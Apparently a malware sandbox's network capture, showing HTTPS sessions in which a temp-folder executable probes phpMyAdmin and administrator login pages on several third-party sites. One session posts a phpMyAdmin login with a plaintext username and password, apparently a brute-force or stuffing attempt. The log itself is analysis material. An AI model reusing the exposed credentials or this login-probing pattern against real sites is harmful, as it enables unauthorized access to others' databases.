2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://iisalessandrini.edu.it/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.6	52200	218.213.216.154	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:06 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.hk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:06 UTC	1383	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 32 30 20 46 65 62 20 32 30 32 34 20 32 33 3a 32 36 3a 30 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 68 70 4d 79 41 64 6d 69 6e 3d 66 65 6c 69 35 6a 64 65 6c 34 67 6d 6a 31 76 65 33 6d 65 33 61 36 65 35 69 6a 6b 62 6f 32 6f 34 3b 20 70 61 74 68 3d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 3b 20 73 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 32 31 20 46 65 62 20 32 30 32 34 20 30 37 3a 32 36 3a 30 36 20 2b 30 38 30 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 Data Ascii: HTTP/1.0 401 UnauthorizedDate: Tue, 20 Feb 2024 23:26:06 GMTServer: ApacheSet-Cookie: phpMyAdmin=feli5jdel4gmj1ve3me3a6e5ijkbo2o4; path=/phpmyadmin/; secure; HttpOnlyExpires: Wed, 21 Feb 2024 07:26:06 +0800Cache-Control: no-store, no-cache, must
2024-02-20 23:26:06 UTC	5219	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 20 64 69 72 3d 27 6c 74 72 27 20 63 6c 61 73 73 3d 27 66 69 72 65 66 6f 78 20 66 69 72 65 66 6f 78 33 34 27 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 73 74 79 6c 65 20 69 64 3d Data Ascii: <!DOCTYPE HTML><html lang='en' dir='ltr' class='firefox firefox34'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible" content="IE=Edge"><style id=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.6	53276	15.197.204.56	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:06 UTC	390	OUT	GET /administrator/index.php HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://att.com.au/administrator/
2024-02-20 23:26:06 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_lEkjxxe6Eh2AFYlgNQi+56hlX5GeGaOUt/5yMLPOdBuhMO+R+Y5TyP8yQpJknKMCn5JMteYmw/2NpWAs6KHdAA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:06 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.6	53277	104.21.54.169	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:06 UTC	398	OUT	POST /phpmyadmin/index.php?route=/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip Cookie: phpMyAdmin_https=thvdkd6ka048si3epmtvilp7ef; pma_lang_https=en User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/phpmyadmin/ Content-Length: 174 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:06 UTC	174	OUT	Data Raw: 72 6f 75 74 65 3d 25 32 46 26 6c 61 6e 67 3d 65 6e 26 74 6f 6b 65 6e 3d 35 62 34 33 36 64 37 39 32 37 35 38 37 61 37 37 34 64 32 38 32 61 37 39 35 30 36 36 33 64 32 39 26 73 65 74 5f 73 65 73 73 69 6f 6e 3d 74 68 76 64 6b 64 36 6b 61 30 34 38 73 69 33 65 70 6d 74 76 69 6c 70 37 65 66 26 70 6d 61 5f 75 73 65 72 6e 61 6d 65 3d 6a 61 73 6f 6e 25 34 30 66 6f 72 74 72 65 73 73 72 65 61 6c 63 61 70 69 74 61 6c 2e 63 6f 6d 26 70 6d 61 5f 70 61 73 73 77 6f 72 64 3d 66 6f 72 74 72 65 73 73 25 32 31 26 73 65 72 76 65 72 3d 31 Data Ascii: route=%2F&lang=en&token=5b436d7927587a774d282a7950663d29&set_session=thvdkd6ka048si3epmtvilp7ef&pma_username=jason%40fortressrealcapital.com&pma_password=fortress%21&server=1
2024-02-20 23:26:07 UTC	1361	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:07 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: phpMyAdmin_https=r2ts1istsh7fhv6gp7u9cfldbb; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: pmaAuth-1_https=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/phpmyadmin/; secure last-modified: Tue, 20 Feb 2024 23:26:07 GMT
2024-02-20 23:26:07 UTC	443	IN	Data Raw: 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 5a 62 45 7a 47 68 51 7a 63 38 43 58 41 37 66 51 45 62 56 52 31 7a 53 38 72 68 32 68 4e 25 32 46 4b 4b 51 75 36 66 64 63 56 6f 61 7a 45 30 69 59 4b 4e 78 76 4f 6d 71 6a 4d 52 35 5a 73 30 77 42 6a 6f 62 73 34 6d 5a 38 4d 68 32 4a 33 5a 44 4d 4c 48 48 78 53 75 54 44 6d 6e 56 64 54 47 6f 72 57 55 68 4f 68 77 6d 76 70 35 4d 4e 4a 5a 67 75 6f 58 66 5a 6a 4b 45 6f 61 65 4f 70 66 65 76 4b 6a 57 51 41 70 32 30 71 50 4b 78 41 74 6f 4d 51 25 33 44 25 33 44 22 Data Ascii: CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZbEzGhQzc8CXA7fQEbVR1zS8rh2hN%2FKKQu6fdcVoazE0iYKNxvOmqjMR5Zs0wBjobs4mZ8Mh2J3ZDMLHHxSuTDmnVdTGorWUhOhwmvp5MNJZguoXfZjKEoaeOpfevKjWQAp20qPKxAtoMQ%3D%3D"
2024-02-20 23:26:07 UTC	1369	IN	Data Raw: 34 61 36 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 4a65<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:07 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
2024-02-20 23:26:07 UTC	1369	IN	Data Raw: 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6e Data Ascii: data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/n
2024-02-20 23:26:07 UTC	1369	IN	Data Raw: 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a Data Ascii: codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></script>
2024-02-20 23:26:07 UTC	1369	IN	Data Raw: 2e 63 6c 6f 73 65 54 65 78 74 20 3d 20 27 44 6f 6e 65 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 Data Ascii: .closeText = 'Done'; $.datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March',
2024-02-20 23:26:07 UTC	1369	IN	Data Raw: 6c 5b 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c Data Ascii: l[''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\
2024-02-20 23:26:07 UTC	1369	IN	Data Raw: 20 6d 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 Data Ascii: max: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u00
2024-02-20 23:26:07 UTC	1369	IN	Data Raw: 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 76 61 6c 69 64 61 74 65 2e 6d 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e Data Ascii: jquery/jquery.validate.min.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.6	55922	45.147.96.4	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:08 UTC	168	OUT	GET / HTTP/1.1 Host: www.glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:09 UTC	449	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Link: <https://www.glazing-bt.com/wp-json/>; rel="https://api.w.org/" Link: <https://www.glazing-bt.com/wp-json/wp/v2/pages/7>; rel="alternate"; type="application/json" Link: <https://www.glazing-bt.com/>; rel=shortlink Strict-Transport-Security: max-age=31536000
2024-02-20 23:26:09 UTC	15935	IN	Data Raw: 66 65 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 Data Ascii: fedf<!DOCTYPE html><html lang="fr-FR" class="no-js" itemscope itemtype="https://schema.org/WebPage"><head><meta charset="UTF-8" />... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id
2024-02-20 23:26:09 UTC	16384	IN	Data Raw: 37 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 2d 66 72 6f 6e 74 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 61 7a 69 6e 67 2d 62 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 2f 69 6e 63 6c 75 64 65 73 2f 2e 2e 2f 63 73 73 2f 66 72 6f 6e 74 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 30 2e 37 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6a 73 5f Data Ascii: 7' type='text/css' media='all' /><link rel='stylesheet' id='cookie-notice-front-css' href='https://www.glazing-bt.com/wp-content/plugins/cookie-notice/includes/../css/front.min.css?ver=6.0.7' type='text/css' media='all' /><link rel='stylesheet' id='js_
2024-02-20 23:26:10 UTC	16384	IN	Data Raw: 74 74 6f 6d 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 20 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 20 3e 20 75 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 30 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 30 3b Data Ascii: ttom}#Top_bar .menu > li > ul.mfn-megamenu-bg > li{background:none}#Top_bar .menu > li > ul.mfn-megamenu-bg > li a{border:none}#Top_bar .menu > li > ul.mfn-megamenu-bg > li > ul{background:none!important;-webkit-box-shadow:0 0 0 0;-moz-box-shadow:0 0 0 0;
